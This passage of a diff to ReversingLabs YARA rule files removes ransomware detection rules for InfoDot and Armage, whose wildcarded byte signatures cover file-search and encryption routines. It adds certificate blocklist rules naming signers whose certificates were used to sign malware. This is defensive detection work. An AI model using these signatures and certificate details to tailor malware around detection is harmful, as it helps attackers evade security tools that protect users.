-            4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ??
-            ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D
-            ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? 8D B7 ?? ?? ?? ?? FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8
-            ?? ?? ?? ?? 84 DB 74 ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8 ?? ?? ?? ?? 84 DB 0F 85 ??
-            ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Yunhuitianxia Technology Co.,Ltd." and pe.signatures [ i ] . serial == "2d:f4:53:58:81:77:cf:1c:0c:29:7f:f4" and 1479735173 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0619C5E39A4Fc60A32F9B07F6A4Ca328 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "ae3ef9cf-4b67-5cb8-9c9b-3edb95da222c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16690-L16706"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "75e3dfd593d7fdc268de54430be617c015957a624f2ca36bc0036d4cbde5b686"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_files and $previous_encrypt_files and $encrypt_files
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "06:19:c5:e3:9a:4f:c6:0a:32:f9:b0:7f:6a:4c:a3:28" and 1475884800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Infodot : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2Bffef48E6A321B418041310Fdb9B0D0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects InfoDot ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2f6447f4-523b-5ea1-a16d-d68bb9bcc79d"
-		date = "2021-02-16"
-		modified = "2021-02-16"
+		id = "6a29551f-8359-5394-9acd-00c3b25d7064"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.InfoDot.yara#L1-L115"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "24a1c25c1d70c21323417ae0892c613361c4bfc829737ef86b6fa7616ae668c6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16708-L16724"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "30a079b55b75b292f7af4f5ae99184cbb3cca1ce4cf20f2f5c961b533673db00"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "InfoDot"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 8B D9 89 9D ?? ?? ?? ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 FF D3 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? EB
-            ?? 8D 49 ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75
-            ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50
-            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85
-            C0 74 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 85 D2 74
-            ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0
-            83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ?? 50 FF 15
-        }
-		$find_files_p2 = {
-            8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 56 50 FF D7 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 FF D3 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? F6 85 ?? ??
-            ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 56 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 50 FF D7 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9
-            EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51
-            8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? 99 83 C4 ?? 0B
-            C2 75 ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 83 CB ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? 8B CF 8D A4 24
-            ?? ?? ?? ?? 66 8B 31 66 3B 32 75 ?? 66 85 F6 74 ?? 66 8B 41 ?? 66 3B 42 ?? 75 ?? 83
-        }
-		$find_files_p3 = {
-            C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50
-            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85
-            C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ??
-            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
-            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ??
-            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 0F 66 3B 08 75 ?? 66 85 C9 74 ?? 66 8B 4F ?? 66 3B 48
-            ?? 75 ?? 83 C7 ?? 83 C0 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 85 DB 7F ?? 8B 95 ?? ?? ?? ?? 7C ?? 81
-        }
-		$find_files_p4 = {
-            FA ?? ?? ?? ?? 73 ?? 3B D8 0F 8F ?? ?? ?? ?? 7C ?? 3B D1 73 ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 EC ?? 8D 95 ?? ?? ?? ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 84 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 3B D8 7F
-            ?? 7C ?? 8B 85 ?? ?? ?? ?? 3B C1 73 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 3D ??
-            ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ??
-            ?? 85 C0 8B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D
-            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8B F1 C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 74 ?? 83 C8 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 56 8D 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 0F 57
-            C0 68 ?? ?? ?? ?? 50 F3 0F 7F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
-            ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
-            57 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B FF
-            81 FF ?? ?? ?? ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
-            50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75
-            ?? 8B C7 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 BE ?? ?? ?? ?? 2B F0 8D 85 ?? ?? ?? ??
-            56 03 C7 56 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F7 8D 85 ?? ??
-            ?? ?? 56 50 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 6A ?? 50 E8 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ??
-            83 C4 ?? 33 CD 33 C0 5F 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A&D DOMUS LIMITED" and pe.signatures [ i ] . serial == "2b:ff:ef:48:e6:a3:21:b4:18:04:13:10:fd:b9:b0:d0" and 1554681600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_34Ec9565805F34204C6966Fb81E36Ba1 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "bd032608-8622-5c7a-a3a7-808d73e611d7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16726-L16742"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e434a02f5b9b22a25d8fe7a0bb7bd81b1cd8bc5356b4b626e3bfceb3f554a085"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "34:ec:95:65:80:5f:34:20:4c:69:66:fb:81:e3:6b:a1" and 1476921600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Armage : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_B2B934B7F01E0Ac1E577814992243709 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Armage ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "94cf639b-7d9e-51ca-b547-e0d591581df2"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "19930e7b-09cb-5c04-b838-3d8d73ba194b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Armage.yara#L1-L128"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "aa8ddcbb0fdcad15e603e000db1d4f86eae7d42efce1c1d21dc3dd57ee9f4319"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16744-L16762"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "37b254ab76d144c09cc7b622dba59f5e372bf01ae12ce260a06143abb52062f6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Armage"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 89 E5 53 8D 5D ?? 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 8D 5D
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 65 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45
-            ?? 8D 50 ?? 8D 48 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 89 50 ?? 89
-            95 ?? ?? ?? ?? 8D 50 ?? 89 50 ?? 89 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 5D ?? 83 EC ?? 89 5D ??
-            8B 41 ?? 8B 51 ?? 8D 4D ?? 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 45 ?? 8D 5D ?? 83 EC ?? 89 5C 24 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 45 ?? 8D 5D ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 89 42 ?? 8B 55 ?? 89 4C 24 ?? 89 04 24 29 CA 89 54 24
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 42 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 89 42
-            ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ??
-            8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4C 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 85 ?? ?? ??
-            ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 44 24
-            ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 5C 24 ?? 8B 8D ??
-            ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ??
-            ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8D 45 ?? 89 04 24 E8
-        }
-		$encrypt_files_p2 = {
-            8B 55 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? 8D 4A ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D
-            55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 8B 40 ?? 8B 80 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 80 78 ?? ?? 74 ?? 0F BE 40 ?? 89 04 24 B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            8B 45 ?? 85 C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D
-            ?? C9 C3 90 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8B 00 8B 50 ?? B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? FF D2 83 EC ?? 0F BE C0 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89
-            85 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83
-            E8 ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85
-            C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 3B 85 ?? ?? ?? ?? 74 ?? 89 04 24
-            E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 39 85 ?? ?? ?? ?? 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0
-            75 ?? EB
-        }
-		$find_files_p1 = {
-            55 89 E5 81 EC ?? ?? ?? ?? 8D 55 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 89 55 ?? 8D 55 ?? 89 65 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ??
-            8B 4D ?? 83 C0 ?? 8B 51 ?? 89 45 ?? 8D 45 ?? 89 45 ?? 8B 45 ?? 89 55 ?? 8B 00 89 C1
-            89 45 ?? 01 D1 74 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 45 ?? 83 F8 ?? 89 45 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B
-            45 ?? 8D 55 ?? 0F B6 00 88 45 ?? B8 ?? ?? ?? ?? 89 45 ?? C6 04 02 ?? B8 ?? ?? ?? ??
-            2B 45 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89
-            04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 83 EC ?? 89 81 ?? ?? ??
-            ?? 8D 4D ?? 39 CA 74 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? 83 F8
-        }
-		$find_files_p2 = {
-            8B 45 ?? 0F 95 00 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? C9 C2 ?? ?? 8D 76 ?? 8D 45 ?? 8B
-            4D ?? 89 4C 24 ?? 8B 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? E9
-            ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 89 45 ?? 89 55 ?? EB ?? C7 04 24 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 85 C0 74 ?? 83 E8
-            ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 66 90 55 89 E5 57 56 8D 45 ?? 53 83 EC ??
-            89 45 ?? 8D 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 89 65 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D ?? C6 45 ?? ?? 8B 83 ?? ?? ??
-            ?? 83 F8 ?? 74 ?? 8D 53 ?? 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 EC ?? 85 C0 0F 95 45 ?? 0F B6 45 ?? 8B 75 ?? 88 06 8B 45 ?? 89 04 24 E8 ?? ?? ??
-            ?? 0F B6 45 ?? 8D 65 ?? 5B 5E 5F 5D C3
-        }
-		$enum_resources_p1 = {
